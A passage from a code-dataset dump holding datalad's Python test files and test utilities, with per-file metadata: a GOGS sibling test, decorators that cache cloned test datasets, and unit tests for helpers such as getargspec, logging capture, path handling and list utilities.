### ### ### ### ### ### ### ### ### ##\n\"\"\"Test create publication target on GOGS\"\"\"\n\nfrom datalad.api import (\n Dataset,\n create_sibling_gogs,\n)\nfrom datalad.tests.utils_pytest import (\n assert_raises,\n skip_if_no_network,\n with_tempfile,\n)\n\nfrom .test_create_sibling_ghlike import check4real\n\n\n@with_tempfile\ndef test_invalid_call(path=None):\n ds = Dataset(path).create()\n # no API url given\n assert_raises(ValueError, ds.create_sibling_gogs, 'bogus')\n\n\n@skip_if_no_network\n@with_tempfile\ndef test_gogs(path=None):\n # try.gogs.io will only handle 10 repos, but we need one\n # and could handle 10 concurrent test runs\n check4real(\n create_sibling_gogs,\n path,\n 'gogs',\n 'https://try.gogs.io',\n 'api/v1/repos/dataladtester/{reponame}',\n )\n" }, { "alpha_fraction": 0.6356340050697327, "alphanum_fraction": 0.6364365816116333, "avg_line_length": 38.399208068847656, "blob_id": "de45a5e50add83379984660cf236520bc2ef9456", "content_id": "b5e92dbac46b58c1aa8b6ee827958b25e477b52b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9968, "license_type": "permissive", "max_line_length": 80, "num_lines": 253, "path": "/datalad/tests/utils_cached_dataset.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Utils for cached test datasets\"\"\"\n\nfrom datalad import cfg\nfrom datalad.core.distributed.clone import Clone\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.tests.utils_pytest import (\n DEFAULT_REMOTE,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n better_wraps,\n ensure_list,\n optional_args,\n rmtree,\n)\n\nDATALAD_TESTS_CACHE = cfg.obtain(\"datalad.tests.cache\")\n\n\ndef url2filename(url):\n \"\"\"generate file/directory name from a URL\"\"\"\n\n # TODO: Not really important for now, but there should be a more\n # sophisticated approach to replace. May be just everything that\n # isn't alphanumeric? Or simply hash the URL?\n # URL: Will include version eventually. Would need parsing to hash\n # w/o any parameters. 
Having separate clones per requested version\n # would defy point of cache, particularly wrt downloading content.\n # Depends on usecase, of course, but immediate one is about container\n # images -> not cheap.\n # make it a Path, too, so pathlib can raise if we are creating an invalid\n # path on some system we run the tests on.\n return Path(\n url.lower().replace(\"/\", \"_\").replace(\":\", \"_\").replace(\"?\", \"_\"))\n\n\ndef get_cached_dataset(url, version=None, keys=None):\n \"\"\" Helper to get a cached clone from url\n\n Intended for use from within `cached_dataset` and `cached_url` decorators.\n Clones `url` into user's cache under datalad/tests/`name`. If such a clone\n already exists, don't clone but return the existing one. So, it's supposed\n to cache the original source in order to reduce time and traffic for tests,\n by letting subsequent requests clone from a local location directly.\n\n If it's an annex get the content as provided by `keys`, too.\n Note, that as a transparent cache replacing the repo at URL from the POV of\n a test, we can't address content via paths, since those are valid only with\n respect to a particular worktree. If different tests clone from the same\n cached dataset, each requesting different versions and different paths\n thereof, we run into trouble if the cache itself checks out a particular\n requested version.\n\n Verifies that `version` can be checked out, but doesn't actually do it,\n since the cached dataset is intended to be used as origin instead of the\n original remote at URL by the `cached_dataset` test decorator. Checkout of\n a particular version should happen in its clone.\n\n Parameters\n ----------\n url: str\n URL to clone from\n keys: str or list or None\n (list of) annex keys to get content for.\n version: str or None\n A commit or an object that can be dereferenced to one.\n\n Returns\n -------\n Dataset\n \"\"\"\n\n # TODO: What about recursive? Might be complicated. We would need to make\n # sure we can recursively clone _from_ here then, potentially\n # requiring submodule URL rewrites. Not sure about that ATM.\n\n # TODO: Given that it is supposed to be a cache for the original repo at\n # `url`, we prob. should make this a bare repository. We don't need\n # a potentially expensive checkout here. Need to double check\n # `annex-get --key` in bare repos, though. Plus datalad-clone doesn't\n # have --bare yet. But we want all the annex/special-remote/ria magic\n # of datalad. So, plain git-clone --bare is not an option.\n\n if not DATALAD_TESTS_CACHE:\n raise ValueError(\"Caching disabled by config\")\n\n ds = Dataset(DATALAD_TESTS_CACHE / url2filename(url))\n\n if not ds.is_installed():\n ds = Clone()(url, ds.pathobj)\n\n # When/How to update a dataset in cache? If version is a commit SHA and we\n # have it, there's no need for an update. Otherwise it gets tricky, because\n # this is a cache, not a checkout a test would operate on. It needs to\n # behave as if it was the thing at `url` from the point of view of the test\n # using it (cloning/getting content from here). 
We would need to update all\n # references, not just fetch them!\n #\n # Can we even (cheaply) tell whether `version` is an absolute reference\n # (actual SHA, not a branch/tag)?\n #\n # NOTE: - consider git-clone --mirror, but as w/ --bare: not an option for\n # datalad-clone yet.\n # - --reference[-if-able] might also be worth thinking about for\n # the clone @cached_dataset creates wrt clone in cacheq\n #\n # So, for now fetch, figure whether there actually was something to fetch\n # and if so simply invalidate cache and re-clone/get. Don't overcomplicate\n # things. It's about datasets used in the tests - they shouldn't change too\n # frequently.\n elif any('uptodate' not in c['operations']\n for c in ds.repo.fetch(DEFAULT_REMOTE)):\n rmtree(ds.path)\n ds = Clone()(url, ds.pathobj)\n\n if version:\n # check whether version is available\n assert ds.repo.commit_exists(version)\n if keys and AnnexRepo.is_valid_repo(ds.path):\n ds.repo.get(keys, key=True)\n\n return ds\n\n\n@optional_args\ndef cached_dataset(f, url=None, version=None, paths=None):\n \"\"\"Test decorator providing a clone of `url` from cache\n\n If config datalad.tests.cache is not set, delivers a clone in a temporary\n location of the original `url`. Otherwise that clone is in fact a clone of a\n cached dataset (origin being the cache instead of `url`).\n This allows to reduce time and network traffic when using a dataset in\n different tests.\n\n The clone will checkout `version` and get the content for `paths`.\n\n Parameters\n ----------\n url: str\n URL to the to be cloned dataset\n version: str\n committish to checkout in the clone\n paths: str or list\n annexed content to get\n\n Returns\n -------\n Dataset\n a clone of the dataset at `url` at a temporary location (cleaned up,\n after decorated test is finished - see with_tempfile). If caching is\n enabled, it's actually a clone of a clone, 'origin' being the clone in\n cache rather than the original repo at `url`.\n \"\"\"\n @better_wraps(f)\n @with_tempfile\n def _wrap_cached_dataset(*arg, **kw):\n\n if DATALAD_TESTS_CACHE:\n # Note: We can't pass keys based on `paths` parameter to\n # get_cached_dataset yet, since translation to keys depends on a\n # worktree. We'll have the worktree of `version` only after cloning.\n ds = get_cached_dataset(url, version=version)\n clone_ds = Clone()(ds.pathobj, arg[-1])\n else:\n clone_ds = Clone()(url, arg[-1])\n #save some cycles\n clone_repo = clone_ds.repo\n if version:\n clone_repo.checkout(version)\n if paths and AnnexRepo.is_valid_repo(clone_ds.path):\n # just assume ds is annex as well. Otherwise `Clone` wouldn't\n # work correctly - we don't need to test its implementation here\n if DATALAD_TESTS_CACHE:\n # cache is enabled; we need to make sure it has the desired\n # content, so clone_ds can get it from there. However, we got\n # `paths` and potentially a `version` they refer to. We can't\n # assume the same (or any) worktree in cache. 
Hence we need to\n # translate to keys.\n # MIH Despite the variable names used in this function\n # (pathS, keyS) they ultimately are passed to get(..., key=True)\n # which means that it can ever only be a single path and a\n # single key -- this is very confusing.\n # the key determination could hence be done with\n # get_file_annexinfo() in a much simpler way, but it seems this\n # function wants to be ready for more, sigh\n keys = [\n p['key']\n for p in clone_repo.get_content_annexinfo(\n ensure_list(paths), init=None).values()\n if 'key' in p\n ]\n if keys:\n ds.repo.get(keys, key=True)\n clone_repo.fsck(remote=DEFAULT_REMOTE, fast=True)\n\n clone_ds.get(paths)\n return f(*(arg[:-1] + (clone_ds,)), **kw)\n\n return _wrap_cached_dataset\n\n\n@optional_args\ndef cached_url(f, url=None, keys=None):\n \"\"\"Test decorator providing a URL to clone from, pointing to cached dataset\n\n If config datalad.tests.cache is not set, delivers the original `url`,\n otherwise a file-scheme url to the cached clone thereof.\n\n Notes\n -----\n\n While this is similar to `cached_dataset`, there are important differences.\n\n 1. As we deliver an URL, `version` parameter is irrelevant. The only\n relevant notion of version would need to be included in the URL\n\n 2. We cannot request particular paths to be present in cache, since we\n a version to refer to by those paths. Therefore keys need to be\n specified.\n\n Parameters\n ----------\n url: str\n URL to the original dataset\n keys: str or list or None\n (list of) annex keys to get content for.\n\n Returns\n -------\n str\n URL to the cached dataset or the original URL if caching was disabled\n \"\"\"\n\n # TODO: See Notes 1.)\n # Append fragments/parameters of `url` to what we return -\n # depending on how we generally decide to address versioned\n # URLs for clone etc.\n\n @better_wraps(f)\n def _wrap_cached_url(*arg, **kw):\n if DATALAD_TESTS_CACHE:\n ds = get_cached_dataset(url, version=None)\n if keys:\n ds.repo.get(keys, key=True)\n new_url = ds.pathobj.as_uri()\n else:\n new_url = url\n\n return f(*(arg + (new_url,)), **kw)\n\n return _wrap_cached_url\n" }, { "alpha_fraction": 0.5661395192146301, "alphanum_fraction": 0.5817580819129944, "avg_line_length": 31.035539627075195, "blob_id": "a23cc618360afed7710c1d8d03765d3135a98199", "content_id": "eecaf59640af7bd8dab44a507d753ab5682844fe", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 46032, "license_type": "permissive", "max_line_length": 99, "num_lines": 1435, "path": "/datalad/tests/test_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test testing utilities\n\n\"\"\"\n\nimport inspect\nimport logging\nimport os\nimport os.path as op\nimport shutil\nimport stat\nimport sys\nimport time\nfrom functools import wraps\nfrom operator import itemgetter\nfrom os.path import (\n abspath,\n basename,\n dirname,\n exists,\n expanduser,\n expandvars,\n isabs,\n)\nfrom os.path import join as opj\nfrom os.path import (\n normpath,\n pardir,\n)\nfrom unittest.mock import patch\n\nimport 
pytest\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.utils import (\n CMD_MAX_ARG,\n Path,\n _path_,\n any_re_search,\n auto_repr,\n better_wraps,\n chpwd,\n create_tree,\n disable_logger,\n dlabspath,\n ensure_write_permission,\n expandpath,\n file_basename,\n find_files,\n generate_chunks,\n get_dataset_root,\n get_open_files,\n get_path_prefix,\n get_sig_param_names,\n get_timestamp_suffix,\n get_trace,\n getargspec,\n getpwd,\n import_module_from_file,\n import_modules,\n is_explicit_path,\n is_interactive,\n join_cmdline,\n knows_annex,\n line_profile,\n make_tempfile,\n map_items,\n md5sum,\n never_fail,\n not_supported_on_windows,\n obtain_write_permission,\n on_windows,\n partition,\n path_is_subpath,\n path_startswith,\n rotree,\n split_cmdline,\n swallow_logs,\n swallow_outputs,\n todo_interface_for_extensions,\n unique,\n unlink,\n updated,\n)\n\nfrom .utils_pytest import (\n OBSCURE_FILENAME,\n SkipTest,\n assert_cwd_unchanged,\n assert_equal,\n assert_false,\n assert_greater,\n assert_in,\n assert_not_in,\n assert_raises,\n assert_true,\n ensure_bool,\n ensure_dict_from_str,\n ensure_iter,\n ensure_list,\n ensure_list_from_str,\n ensure_unicode,\n eq_,\n has_symlink_capability,\n known_failure,\n nok_,\n ok_,\n ok_file_has_content,\n ok_generator,\n ok_startswith,\n on_travis,\n probe_known_failure,\n skip_if,\n skip_if_no_module,\n skip_if_on_windows,\n skip_if_root,\n skip_known_failure,\n skip_wo_symlink_capability,\n with_tempfile,\n with_tree,\n)\n\n\ndef test_better_wraps():\n def wraps_decorator(func):\n @wraps(func)\n def _wrap_wraps_decorator(*args, **kwargs):\n return func(*args, **kwargs)\n\n return _wrap_wraps_decorator\n\n def better_decorator(func):\n @better_wraps(func)\n def _wrap_better_decorator(*args, **kwargs):\n return func(*args, **kwargs)\n\n return _wrap_better_decorator\n\n @wraps_decorator\n def function1(a, b, c):\n return \"function1\"\n\n @better_decorator\n def function2(a, b, c):\n return \"function2\"\n\n eq_(\"function1\", function1(1, 2, 3))\n # getargspec shim now can handle @wraps'ed functions just fine\n eq_(getargspec(function1)[0], ['a', 'b', 'c'])\n eq_(\"function2\", function2(1, 2, 3))\n eq_(getargspec(function2)[0], ['a', 'b', 'c'])\n\n\n# TODO?: make again parametric on eq_argspec invocations?\[email protected](r\"ignore: inspect.getargspec\\(\\) is deprecated\")\ndef test_getargspec():\n\n def eq_argspec(f, expected, has_kwonlyargs=False):\n \"\"\"A helper to centralize testing of getargspec on original and wrapped function\n\n has_kwonlyargs is to instruct if function has kwonly args so we do not try to compare\n to inspect.get*spec functions, which would barf ValueError if attempted to run on a\n function with kwonlys. 
And also we pass it as include_kwonlyargs to our getargspec\n \"\"\"\n # so we know that our expected is correct\n if not has_kwonlyargs:\n # if False - we test function with kwonlys - inspect.getargspec would barf\n if sys.version_info < (3, 11):\n eq_(inspect.getargspec(f), expected)\n # and getfullargspec[:4] wouldn't provide a full picture\n eq_(inspect.getfullargspec(f)[:4], expected)\n else:\n if sys.version_info < (3, 11):\n assert_raises(ValueError, inspect.getargspec, f)\n inspect.getfullargspec(f) # doesn't barf\n eq_(getargspec(f, include_kwonlyargs=has_kwonlyargs), expected)\n\n # and lets try on a wrapped one -- only ours can do the right thing\n def decorator(f):\n @wraps(f)\n def wrapper(*args, **kwargs): # pragma: no cover\n return f(*args, **kwargs)\n return wrapper\n fw = decorator(f)\n if has_kwonlyargs:\n # We barf ValueError similarly to inspect.getargspec, unless explicitly requested\n # to include kwonlyargs\n assert_raises(ValueError, getargspec, fw)\n eq_(getargspec(fw, include_kwonlyargs=has_kwonlyargs), expected)\n\n def f0(): # pragma: no cover\n pass\n\n eq_argspec(f0, ([], None, None, None))\n\n def f1(a1, kw1=None, kw0=1): # pragma: no cover\n pass\n\n eq_argspec(f1, (['a1', 'kw1', 'kw0'], None, None, (None, 1)))\n\n # Having *a already makes keyword args to be kwonlyargs, in that\n # inspect.get*spec would barf\n def f1_args(a1, *a, kw1=None, kw0=1, **kw): # pragma: no cover\n pass\n\n eq_argspec(f1_args, (['a1', 'kw1', 'kw0'], 'a', 'kw', (None, 1)), True)\n\n def f1_star(a1, *, kw1=None, kw0=1): # pragma: no cover\n pass\n\n assert_raises(ValueError, getargspec, f1_star)\n eq_argspec(f1_star, (['a1', 'kw1', 'kw0'], None, None, (None, 1)), True)\n\n\ndef test_get_sig_param_names():\n def f(a1, kw1=None, *args, kw2=None, **kwargs):\n pass # pragma: no cover\n\n # note: `a1` could be used either positionally or via keyword, so is listed in kw_any\n assert_equal(get_sig_param_names(f, ('kw_only', 'kw_any')), (['kw2'], ['a1', 'kw1', 'kw2']))\n assert_equal(get_sig_param_names(f, ('any',)), (['a1', 'kw1', 'kw2'],))\n assert_equal(get_sig_param_names(f, tuple()), ())\n assert_raises(ValueError, get_sig_param_names, f, ('mumba',))\n\n\n@with_tempfile(mkdir=True)\ndef test_rotree(d=None):\n d2 = opj(d, 'd1', 'd2') # deep nested directory\n f = opj(d2, 'f1')\n os.makedirs(d2)\n with open(f, 'w') as f_:\n f_.write(\"LOAD\")\n with swallow_logs():\n ar = AnnexRepo(d2)\n rotree(d)\n # we shouldn't be able to delete anything UNLESS in \"crippled\" situation:\n # root, or filesystem is FAT etc\n # Theoretically annex should declare FS as crippled when ran as root, but\n # see http://git-annex.branchable.com/bugs/decides_that_FS_is_crippled_\n # under_cowbuilder___40__symlinks_supported_etc__41__/#comment-60c3cbe2710d6865fb9b7d6e247cd7aa\n # so explicit 'or'\n if not (ar.is_crippled_fs() or (os.getuid() == 0)):\n assert_raises(OSError, os.unlink, f) # OK to use os.unlink\n assert_raises(OSError, unlink, f) # and even with waiting and trying!\n assert_raises(OSError, shutil.rmtree, d)\n # but file should still be accessible\n with open(f) as f_:\n eq_(f_.read(), \"LOAD\")\n # make it RW\n rotree(d, False)\n unlink(f)\n shutil.rmtree(d)\n\n\ndef test_swallow_outputs():\n with swallow_outputs() as cm:\n eq_(cm.out, '')\n sys.stdout.write(\"out normal\")\n sys.stderr.write(\"out error\")\n eq_(cm.out, 'out normal')\n sys.stdout.write(\" and more\")\n eq_(cm.out, 'out normal and more') # incremental\n eq_(cm.err, 'out error')\n eq_(cm.err, 'out error') # the same value if 
multiple times\n\n\n@with_tempfile\ndef test_swallow_logs(logfile=None):\n lgr = logging.getLogger('datalad')\n with swallow_logs(new_level=9) as cm:\n eq_(cm.out, '')\n lgr.log(8, \"very heavy debug\")\n eq_(cm.out, '') # not even visible at level 9\n lgr.log(9, \"debug1\")\n eq_(cm.out, '[Level 9] debug1\\n') # not even visible at level 9\n lgr.info(\"info\")\n # not even visible at level 9\n eq_(cm.out, '[Level 9] debug1\\n[INFO] info\\n')\n with swallow_logs(new_level=9, file_=logfile) as cm:\n eq_(cm.out, '')\n lgr.info(\"next info\")\n from datalad.tests.utils_pytest import ok_file_has_content\n ok_file_has_content(logfile, \"[INFO] next info\", strip=True)\n\n\ndef test_swallow_logs_assert():\n lgr = logging.getLogger('datalad.tests')\n with swallow_logs(new_level=9) as cm:\n # nothing was logged so should fail\n assert_raises(AssertionError, cm.assert_logged)\n lgr.info(\"something\")\n cm.assert_logged(\"something\")\n cm.assert_logged(level=\"INFO\")\n cm.assert_logged(\"something\", level=\"INFO\")\n\n # even with regex = False should match above\n cm.assert_logged(\"something\", regex=False)\n cm.assert_logged(level=\"INFO\", regex=False)\n cm.assert_logged(\"something\", level=\"INFO\", regex=False)\n\n # different level\n assert_raises(AssertionError,\n cm.assert_logged, \"something\", level=\"DEBUG\")\n assert_raises(AssertionError, cm.assert_logged, \"else\")\n\n cm.assert_logged(\"some.hing\", level=\"INFO\") # regex ;-)\n # does match\n assert_raises(AssertionError,\n cm.assert_logged, \"ome.hing\", level=\"INFO\")\n # but we can change it\n cm.assert_logged(\"some.hing\", level=\"INFO\", match=False)\n # and we can continue doing checks after we left the cm block\n cm.assert_logged(\"some.hing\", level=\"INFO\", match=False)\n # and we indeed logged something\n cm.assert_logged(match=False)\n\n\ndef test_disable_logger():\n\n # get a logger hierarchy:\n lgr_top = logging.getLogger('datalad')\n lgr_middle = logging.getLogger('datalad.tests')\n lgr_bottom = logging.getLogger('datalad.tests.utils_pytest')\n\n with swallow_logs(new_level=logging.DEBUG) as cml:\n with disable_logger(): # default: 'datalad':\n lgr_top.debug(\"log sth at top level\")\n lgr_middle.debug(\"log sth at mid level\")\n lgr_bottom.debug(\"log sth at bottom level\")\n # nothing logged:\n assert_raises(AssertionError, cml.assert_logged)\n\n # again, but pass in the logger at mid level:\n with swallow_logs(new_level=logging.DEBUG) as cml:\n with disable_logger(lgr_middle):\n lgr_top.debug(\"log sth at top level\")\n lgr_middle.debug(\"log sth at mid level\")\n lgr_bottom.debug(\"log sth at bottom level\")\n # top level unaffected:\n cml.assert_logged(\"log sth at top level\", level=\"DEBUG\", regex=False)\n # but both of the lower ones don't log anything:\n assert_raises(AssertionError, cml.assert_logged, \"log sth at mid level\")\n assert_raises(AssertionError, cml.assert_logged, \"log sth at bottom level\")\n\n\ndef test_md5sum():\n # just a smoke (encoding/decoding) test for md5sum\n _ = md5sum(__file__)\n\n\n@with_tree([('1.tar.gz', (('1 f.txt', '1 f load'),))])\ndef test_md5sum_archive(d=None):\n # just a smoke (encoding/decoding) test for md5sum\n _ = md5sum(opj(d, '1.tar.gz'))\n\n\ndef test_updated():\n d = {}\n eq_(updated(d, {1: 2}), {1: 2})\n eq_(d, {})\n\n d = {'a': 'b'}\n eq_(updated(d, ((0, 1), (2, 3))), {0: 1, 'a': 'b', 2: 3})\n eq_(d, {'a': 'b'})\n\n # and that it would maintain the type\n d = dict(((99, 0), ('z', 0), ('a', 0)))\n d_ = updated(d, {0: 1})\n ok_(isinstance(d_, dict))\n 
eq_(d_, dict(((99, 0), ('z', 0), ('a', 0), (0, 1))))\n\n\ndef test_get_local_file_url_windows():\n raise SkipTest(\"TODO\")\n\n\n@assert_cwd_unchanged\ndef test_getpwd_basic():\n pwd = getpwd()\n ok_(isabs(pwd))\n eq_(os.getcwd(), abspath(pwd))\n\n # that we do not chdir anywhere if None provided\n with patch('os.chdir') as oschdir:\n with chpwd(None):\n eq_(getpwd(), pwd)\n assert_false(oschdir.called)\n\n\n@with_tempfile(mkdir=True)\n@assert_cwd_unchanged(ok_to_chdir=True)\ndef test_getpwd_change_mode(tdir=None):\n from datalad import utils\n if utils._pwd_mode != 'PWD':\n raise SkipTest(\"Makes sense to be tested only in PWD mode, \"\n \"but we seems to be beyond that already\")\n # The evil plain chdir call\n os.chdir(tdir)\n # Just testing the logic of switching to cwd mode and issuing a warning\n with swallow_logs(new_level=logging.DEBUG) as cml:\n pwd = getpwd()\n eq_(pwd, str(Path(pwd).resolve())) # might have symlinks, thus realpath\n assert_in(\"symlinks in the paths will be resolved\", cml.out)\n eq_(utils._pwd_mode, 'cwd')\n\n\n@skip_wo_symlink_capability\n@skip_if_on_windows\n@with_tempfile(mkdir=True)\n@assert_cwd_unchanged\ndef test_getpwd_symlink(tdir=None):\n sdir = opj(tdir, 's1')\n pwd_orig = getpwd()\n Path(sdir).symlink_to(Path('.'))\n s1dir = opj(sdir, 's1')\n s2dir = opj(sdir, 's2')\n try:\n chpwd(sdir)\n pwd = getpwd()\n eq_(pwd, sdir)\n chpwd('s1')\n eq_(getpwd(), s1dir)\n chpwd('.')\n eq_(getpwd(), s1dir)\n chpwd('..')\n eq_(getpwd(), sdir)\n finally:\n chpwd(pwd_orig)\n\n # test context handler way of use\n with chpwd(s1dir):\n eq_(getpwd(), s1dir)\n eq_(getpwd(), pwd_orig)\n\n assert_false(exists(s2dir))\n with assert_raises(OSError):\n with chpwd(s2dir):\n pass\n with chpwd(s2dir, mkdir=True):\n ok_(exists(s2dir))\n eq_(getpwd(), s2dir)\n\n\n@with_tempfile(mkdir=True)\ndef test_chpwd_obscure_name(topdir=None):\n path = op.join(topdir, OBSCURE_FILENAME)\n os.mkdir(path)\n # Just check that call doesn't fail.\n with chpwd(path):\n pass\n\n\ndef test_auto_repr():\n\n class WithoutReprClass:\n def __init__(self):\n self.a = \"does not matter\"\n\n @auto_repr\n class buga:\n def __init__(self):\n self.a = 1\n self.b = list(range(20))\n self.c = WithoutReprClass()\n self._c = \"protect me\"\n\n def some(self):\n return \"some\"\n\n @auto_repr(short=False)\n class buga_long(object):\n def __init__(self):\n self.a = 1\n self.b = list(range(20))\n\n def some(self):\n return \"some\"\n\n assert_equal(\n repr(buga()),\n \"buga(a=1, b=<<[0, 1, 2, 3, 4++52 chars++ 19]>>, c=<WithoutReprClass>)\"\n )\n assert_equal(buga().some(), \"some\")\n\n assert_equal(\n repr(buga_long()),\n f\"buga_long(a=1, b=[{', '.join(map(str, range(20)))}])\"\n )\n assert_equal(buga_long().some(), \"some\")\n\n\ndef test_todo_interface_for_extensions():\n\n @todo_interface_for_extensions\n def f(i, j):\n return i*j\n\n assert_equal(f(2, 3), 6)\n\n\ndef test_assure_iter():\n s = {1}\n assert ensure_iter(None, set) == set()\n assert ensure_iter(1, set) == s\n assert ensure_iter(1, list) == [1]\n assert ensure_iter(s, set) is s\n assert ensure_iter(s, set, copy=True) is not s\n\n\ndef test_assure_list_copy():\n l = [1]\n assert ensure_list(l) is l\n assert ensure_list(l, copy=True) is not l\n\n\[email protected](\n \"value,result\",\n [\n ('', None),\n ([], None),\n ('somestring', ['somestring']),\n ('some\\nmultiline\\nstring', ['some', 'multiline', 'string']),\n (['something'], ['something']),\n (['a', 'listof', 'stuff'], ['a', 'listof', 'stuff']),\n ]\n)\ndef test_assure_list_from_str(value, 
result):\n assert ensure_list_from_str(value) == result\n\n\ndef test_assure_dict_from_str():\n assert_equal(ensure_dict_from_str(''), None)\n assert_equal(ensure_dict_from_str({}), None)\n target_dict = dict(\n __ac_name='{user}', __ac_password='{password}',\n cookies_enabled='', submit='Log in'\n )\n string = '__ac_name={user}\\n__ac_password={password}\\nsubmit=Log ' \\\n 'in\\ncookies_enabled='\n assert_equal(ensure_dict_from_str(string), target_dict)\n assert_equal(ensure_dict_from_str(\n target_dict),\n target_dict)\n\n\ndef test_assure_bool():\n for values, t in [\n (['True', 1, '1', 'yes', 'on'], True),\n (['False', 0, '0', 'no', 'off'], False)\n ]:\n for v in values:\n eq_(ensure_bool(v), t)\n assert_raises(ValueError, ensure_bool, \"unknown\")\n\n\ndef test_generate_chunks():\n ok_generator(generate_chunks([1], 1))\n eq_(list(generate_chunks([1], 1)), [[1]])\n eq_(list(generate_chunks([1], 2)), [[1]])\n eq_(list(generate_chunks([1, 2, 3], 2)), [[1, 2], [3]])\n # type is preserved\n eq_(list(generate_chunks((1, 2, 3), 2)), [(1, 2), (3,)])\n # no hangers\n eq_(list(generate_chunks((1, 2, 3, 4), 2)), [(1, 2), (3, 4)])\n assert_raises(AssertionError, list, generate_chunks([1], 0))\n\n\ndef test_any_re_search():\n assert_true(any_re_search('a', 'a'))\n assert_true(any_re_search('a', 'bab'))\n assert_false(any_re_search('^a', 'bab'))\n assert_true(any_re_search(['b', '.ab'], 'bab'))\n assert_false(any_re_search(['^b', 'bab'], 'ab'))\n\n\ndef test_find_files():\n tests_dir = dirname(__file__)\n proj_dir = normpath(opj(dirname(__file__), pardir))\n\n ff = find_files('.*', proj_dir)\n ok_generator(ff)\n files = list(ff)\n assert(len(files) > 10) # we have more than 10 test files here\n assert_in(opj(tests_dir, 'test_utils.py'), files)\n # and no directories should be mentioned\n assert_not_in(tests_dir, files)\n\n ff2 = find_files('.*', proj_dir, dirs=True)\n files2 = list(ff2)\n assert_in(opj(tests_dir, 'test_utils.py'), files2)\n assert_in(tests_dir, files2)\n\n # now actually matching the path\n ff3 = find_files(\n r'.*\\\\test_.*\\.py$' if on_windows else r'.*/test_.*\\.py$',\n proj_dir, dirs=True)\n files3 = list(ff3)\n assert_in(opj(tests_dir, 'test_utils.py'), files3)\n assert_not_in(tests_dir, files3)\n for f in files3:\n ok_startswith(basename(f), 'test_')\n\n\n@with_tree(tree={\n '.git': {\n '1': '2'\n },\n 'd1': {\n '.git': 'possibly a link from submodule'\n },\n 'git': 'just a file'\n})\ndef test_find_files_exclude_vcs(repo=None):\n ff = find_files('.*', repo, dirs=True)\n files = list(ff)\n assert_equal({basename(f) for f in files}, {'d1', 'git'})\n assert_not_in(opj(repo, '.git'), files)\n\n ff = find_files('.*', repo, dirs=True, exclude_vcs=False)\n files = list(ff)\n assert_equal({basename(f) for f in files}, {'d1', 'git', '.git', '1'})\n assert_in(opj(repo, '.git'), files)\n\n\ndef test_not_supported_on_windows():\n with patch('datalad.utils.on_windows', True):\n assert_raises(NotImplementedError, not_supported_on_windows)\n assert_raises(NotImplementedError, not_supported_on_windows, \"msg\")\n\n with patch('datalad.utils.on_windows', False):\n assert_equal(not_supported_on_windows(), None)\n assert_equal(not_supported_on_windows(\"msg\"), None)\n\n\ndef test_file_basename():\n eq_(file_basename('1'), '1')\n eq_(file_basename('d1/1'), '1')\n eq_(file_basename('/d1/1'), '1')\n eq_(file_basename('1.'), '1.')\n eq_(file_basename('1.tar.gz'), '1')\n eq_(file_basename('1.Tar.gz'), '1')\n eq_(file_basename('1._bak.gz'), '1')\n eq_(file_basename('1.tar.gz', return_ext=True), 
('1', 'tar.gz'))\n eq_(file_basename('/tmp/1.tar.gz'), '1')\n eq_(file_basename('/tmp/1.longish.gz'), '1.longish')\n eq_(file_basename('1_R1.1.1.tar.gz'), '1_R1.1.1')\n eq_(file_basename('ds202_R1.1.1.tgz'), 'ds202_R1.1.1')\n\n\ndef test_expandpath():\n eq_(expandpath(\"some\", False), expanduser('some'))\n eq_(expandpath(\"some\", False), expandvars('some'))\n assert_true(isabs(expandpath('some')))\n # this may have to go because of platform issues\n if not on_windows:\n # expanduser is not influenced by our HOME setting adjustments\n # for the tests on windows\n eq_(expandpath(\"$HOME\"), expanduser('~'))\n\n\ndef test_is_explicit_path():\n # by default expanded paths are absolute, hence explicit\n assert_true(is_explicit_path(expandpath('~')))\n assert_false(is_explicit_path(\"here\"))\n\n\n@with_tempfile\n@with_tempfile\ndef test_knows_annex(here=None, there=None):\n from datalad.support.annexrepo import AnnexRepo\n from datalad.support.gitrepo import GitRepo\n GitRepo(path=here, create=True)\n assert_false(knows_annex(here))\n AnnexRepo(path=here, create=True)\n assert_true(knows_annex(here))\n GitRepo.clone(path=there, url=here, create=True)\n assert_true(knows_annex(there))\n\n\ndef test_make_tempfile():\n # check if mkdir, content conflict caught\n with assert_raises(ValueError):\n with make_tempfile(content=\"blah\", mkdir=True): # pragma: no cover\n pass\n\n\ndef test_unique():\n eq_(unique(range(3)), [0, 1, 2])\n eq_(unique(range(3), reverse=True), [0, 1, 2])\n eq_(unique((1, 0, 1, 3, 2, 0, 1)), [1, 0, 3, 2])\n eq_(unique((1, 0, 1, 3, 2, 0, 1), reverse=True), [3, 2, 0, 1])\n eq_(unique([]), [])\n eq_(unique([], reverse=True), [])\n eq_(unique([(1, 2), (1,), (1, 2), (0, 3)]), [(1, 2), (1,), (0, 3)])\n eq_(unique([(1, 2), (1,), (1, 2), (0, 3)], reverse=True),\n [(1,), (1, 2), (0, 3)])\n\n # with a key now\n eq_(unique([(1, 2), (1,), (1, 2), (0, 3)],\n key=itemgetter(0)), [(1, 2), (0, 3)])\n eq_(unique([(1, 2), (1,), (1, 2), (0, 3)],\n key=itemgetter(0), reverse=True), [(1, 2), (0, 3)])\n\n eq_(unique([(1, 2), (1, 3), (1, 2), (0, 3)],\n key=itemgetter(1)), [(1, 2), (1, 3)])\n eq_(unique([(1, 2), (1, 3), (1, 2), (0, 3)],\n key=itemgetter(1), reverse=True), [(1, 2), (0, 3)])\n\n\ndef test_partition():\n def fn(*args, **kwargs):\n left, right = partition(*args, **kwargs)\n return list(left), 